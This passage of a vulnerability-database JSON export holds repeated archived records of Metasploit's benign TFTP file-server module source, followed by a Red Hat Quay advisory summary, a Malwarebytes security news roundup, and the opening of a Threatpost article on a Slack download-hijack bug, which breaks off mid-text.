server\")\n @tftp.stop\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2018-08-22T05:33:28", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-23T01:37:31", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2018-08-23T01:37:31", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-27T19:48:52", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2018-08-27T19:48:52", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-28T03:38:37", "history": [], "viewCount": 11, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2018-08-28T03:38:37", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-06T22:07:28", "history": [], "viewCount": 11, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2018-09-06T22:07:28", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "b8fe7c8a3e2750eaf39bc6a3b3e1991f", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-07T03:52:43", "history": [], "viewCount": 41, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "carbonblack", "idList": ["CARBONBLACK:B027EA436203BDA814C4EA51081F6A87", "CARBONBLACK:89E99C6BF8DD5C2DDE08ED61C12701BF"]}, {"type": "avleonov", "idList": ["AVLEONOV:3A8521BFB3F8C5B46C04F0C82A0F2DC1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1671-1:EBBBE", "DEBIAN:DLA-1666-1:43CD3", "DEBIAN:DSA-4387-1:19CD5"]}, {"type": "talosblog", "idList": ["TALOSBLOG:D1788B89D8B17C5C6DB6F32CC37734F7"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:8842738F7C86C87FD607E515176F88C8"]}, {"type": "exploitdb", "idList": ["EDB-ID:46342"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891666", "OPENVAS:1361412562310107540", "OPENVAS:1361412562310107541", "OPENVAS:1361412562310704387"]}, {"type": "kitploit", "idList": ["KITPLOIT:9165290622393060450", "KITPLOIT:7455761002232864942"]}, {"type": "centos", "idList": ["CESA-2019:0231", "CESA-2019:0232"]}, {"type": "cve", "idList": ["CVE-2019-7659", "CVE-2019-1676"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:0153-1"]}], "modified": "2018-09-07T03:52:43"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2018-09-07T03:52:43", "differentElements": ["modified", "published"], "edition": 15}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "5ddba22023fc905a1684e57cd9307977", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-02T19:16:21", "history": [], "viewCount": 41, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1105-1", "OPENSUSE-SU-2019:1111-1", "OPENSUSE-SU-2019:1113-1"]}, {"type": "thn", "idList": ["THN:BD4668D0C2864A2575DE9C758747F0D4", "THN:11AD5537975A6BED16F7C2DFCC323403"]}, {"type": "krebs", "idList": ["KREBS:5D0C14948096E7152BBBFD7B231BB43A"]}, {"type": "threatpost", "idList": ["THREATPOST:EF36042DBE4BC724DB5EBFD76D1D6712"]}, {"type": "ubuntu", "idList": ["USN-3929-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:46638", "EDB-ID:46632"]}, {"type": "gentoo", "idList": ["GLSA-201904-08"]}, {"type": "zdt", "idList": ["1337DAY-ID-32465"]}, {"type": "kitploit", "idList": ["KITPLOIT:6038992159381141666", "KITPLOIT:6159129042388094301"]}, {"type": "cve", "idList": ["CVE-2019-3792", "CVE-2019-3489", "CVE-2019-3876", "CVE-2017-16775"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:322837E9F552129B2CBD8F0F85D540B7"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:4599FE395AEA942F1650F4A831514DC0"]}], "modified": "2019-04-02T19:16:21"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2019-04-02T19:16:21", "differentElements": ["modified", "published"], "edition": 16}], "viewCount": 41, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1123-1", "OPENSUSE-SU-2019:1105-1", "OPENSUSE-SU-2019:1111-1", "OPENSUSE-SU-2019:1113-1"]}, {"type": "thn", "idList": ["THN:BD4668D0C2864A2575DE9C758747F0D4", "THN:11AD5537975A6BED16F7C2DFCC323403"]}, {"type": "threatpost", "idList": ["THREATPOST:5C6E52ADEECE22E57417EB4A24FEA4F5", "THREATPOST:EF36042DBE4BC724DB5EBFD76D1D6712"]}, {"type": "krebs", "idList": ["KREBS:5D0C14948096E7152BBBFD7B231BB43A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32464", "1337DAY-ID-32465", "1337DAY-ID-32472"]}, {"type": "ubuntu", "idList": ["USN-3929-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:46638", "EDB-ID:46632"]}, {"type": "gentoo", "idList": ["GLSA-201904-08"]}, {"type": "kitploit", "idList": ["KITPLOIT:6038992159381141666"]}, {"type": "cve", "idList": ["CVE-2019-3792", "CVE-2019-3489"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:322837E9F552129B2CBD8F0F85D540B7"]}], "modified": "2019-04-03T00:59:47"}, "vulnersScore": 5.0}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"]}

{"redhat": [{"lastseen": "2019-05-20T14:20:41", "bulletinFamily": "unix", "description": "Security Fix(es):\n\n* A flaw was found in the way the DES/3DES cipher was used as part of the\n TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183)\n\nBug Fix(es):\n\n* Running Quay in config mode now works in a disconnected option which doesn't require pulling resources from the Internet.\n\n* Quay's security scan endpoint is now enabled at startup for viewing results of Clair container image scans.", "modified": "2019-05-20T18:11:23", "published": "2019-05-20T18:11:05", "id": "RHSA-2019:1245", "href": "https://access.redhat.com/errata/RHSA-2019:1245", "type": "redhat", "title": "(RHSA-2019:1245) Moderate: Red Hat Quay 3.0.2 security and bug fix update", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "malwarebytes": [{"lastseen": "2019-05-20T16:19:10", "bulletinFamily": "blog", "description": "Last week, Malwarebytes Labs reviewed [active and unique exploit kits](<https://blog.malwarebytes.com/threat-analysis/2019/05/exploit-kits-spring-2019-review/>) targeting consumers and businesses alike, reported about [a flaw in WhatsApp](<https://blog.malwarebytes.com/cybercrime/2019/05/whatsapp-fix-goes-live-after-targeted-attack-on-human-rights-lawyer/>) used to target a human rights lawyer, and wrote about [an important Microsoft patch](<https://blog.malwarebytes.com/cybercrime/2019/05/microsoft-pushes-patch-to-prevent-wannacry-level-vulnerability/>) that aimed to prevent a \"WannaCry level\" attack. We also profiled [the Dharma ransomware](<https://blog.malwarebytes.com/threat-analysis/2019/05/threat-spotlight-crysis-aka-dharma-ransomware-causing-a-crisis-for-businesses/>)\u2014aka CrySIS\u2014and imparted [four lessons from the DDoS attack](<https://blog.malwarebytes.com/101/2019/05/4-lessons-to-be-learned-from-the-does-ddos-attack/>) against the US Department of Energy that disrupted major operations.\n\n### Other cybersecurity news\n\n * Cybersecurity agencies from Canada and Saudi Arabia issued advisories about [hacking groups actively exploiting Microsoft SharePoint server vulnerabilities](<https://www.zdnet.com/article/microsoft-sharepoint-servers-are-under-attack/>) to gain access to private business and government networks. A different patch for the flaw, which was officially designated as [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), was already available as of February this year. (Source: ZDNet)\n * Nefarious actors behind adware try hard to be legit\u2014or at least look the part. A recent discovery of [a pseudo-VPN called Pirate Chick VPN](<https://www.bleepingcomputer.com/news/security/fake-pirate-chick-vpn-pushed-azorult-info-stealing-trojan/>) in an adware bundle was one of the ways they attempted to do this. However, the software is actually a Trojan that pushes malware, particularly the AZORult information stealer. (Source: Bleeping Computer)\n * [SIM-swapping](<https://businesstech.co.za/news/technology/315082/this-is-how-much-money-south-africans-are-losing-to-sim-swap-fraud/>), the fraudulent act of convincing a mobile carrier to swap a target's phone number over to a SIM card owned by the criminal, doubled in South Africa. This scam is used to divert incoming SMS-based tokens used in 2FA-enabled accounts. (Source: BusinessTech)\n * [Ransomware attacks on US cities are on the uptick](<https://www.abcactionnews.com/news/national/crippling-ransomware-attacks-targeting-us-cities-on-the-rise>). So far, there have been 22 known attacks this year. (Source: ABC Action News)\n * [Typosquatting](<https://blog.malwarebytes.com/glossary/typosquatting/>) is back on the radar, and it's mimicking online major new websites to push out fake news or disinformation reports, according to [a report from The Citizen Lab](<https://citizenlab.ca/2019/05/burned-after-reading-endless-mayflys-ephemeral-disinformation-campaign/>). Some of the sites copied were Politico, Bloomberg, and The Atlantic. The group behind this campaign is Endless Mayfly, an Iranian \"disinformation supply chain.\" (Source: The Citizen Lab)\n * No surprise here: Researchers from Charles III University of Madrid (Universidad Carlos III de Madrid) and Stony Brook University in the US found that [Android smartphones are riddled with bloatware](<https://nakedsecurity.sophos.com/2019/05/13/study-finds-android-smartphones-riddled-with-suspect-bloatware/>), which creates hidden privacy and security risks to users. (Source: Sophos's Naked Security Blog)\n * Organizations who are using the cloud to store PII [were considering moving back to on-premise means to store data](<https://www.netwrix.com/survey_organizations_that_store_customer_pii_in_the_cloud_consider_moving_it_back_on_premises_due_to_security_concerns.html>) due to cloud security concerns, according to a survey. (Source: Netwrix)\n * The Office of the Australian Information Commissioner (OAIC) recently released [a report about their findings on breaches in healthcare](<https://www.crn.com.au/news/health-sector-still-plagued-by-breaches-according-to-latest-oaic-report-525046>), which is still an ongoing problem. They found that such breaches were caused mainly by human error. (Source: CRN)\n * Websites of retailers are continuously [facing billions of hacking attempts every year](<https://biztechmagazine.com/article/2019/05/retailers-are-under-siege-botnets>), according to an Akamai Technology report. Consumers should take this as a wake-up call to stop reusing credentials across all their online accounts. (Source: BizTech Magazine)\n * After the discovery of Meltdown and Spectre, security flaws found in Intel and AMD chips, [several researchers have again uncovered another flaw](<https://www.wired.com/story/intel-mds-attack-speculative-execution-buffer/>) that could allow attackers to eavesdrop on every piece of user data that a processor touches. Intel collectively calls attacks against this flaw as Microarchitectural Data Sampling (MDS). (Source: Wired)\n\nStay safe, everyone!\n\nThe post [A week in security (May 13 - 19)](<https://blog.malwarebytes.com/security-world/2019/05/a-week-in-security-may-13-19/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2019-05-20T15:57:29", "published": "2019-05-20T15:57:29", "id": "MALWAREBYTES:7E03882ED3E2DC3F06ABC3D88D86D4E6", "href": "https://blog.malwarebytes.com/security-world/2019/05/a-week-in-security-may-13-19/", "type": "malwarebytes", "title": "A week in security (May 13 \u2013 19)", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2019-05-20T14:31:47", "bulletinFamily": "info", "description": "A remotely exploitable vulnerability in the Windows desktop app version of the Slack collaboration platform has been uncovered, which allows attackers to alter where files from Slack are downloaded. Nefarious types could redirect the files to their own SMB server; and, they could manipulate the contents of those documents, altering information or injecting malware.\n\nAccording to Tenable Research\u2019s David Wells, who discovered the bug and reported it via the HackerOne bug-bounty platform, a download hijack vulnerability in Slack Desktop version 3.3.7 for Windows would allow an attacker to post a specially crafted hyperlink into a Slack channel that changes the document download location path when clicked. Victims can still open the downloaded document through the application, however, that will be done from the attacker\u2019s Server Message Block (SMB) share.\n\n\u201c[The issue exists in] the \u2018slack://\u2019 protocol handler, which has the capability to change sensitive settings in the Slack Desktop Application,\u201d Wells said [in a posting](<https://www.tenable.com/blog/slack-patches-download-hijack-vulnerability-in-windows-desktop-app>) on Friday. \u201cThis download path can be an attacker-owned SMB share, which would cause all future documents downloaded in Slack to be instantly uploaded to the attacker\u2019s server.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe 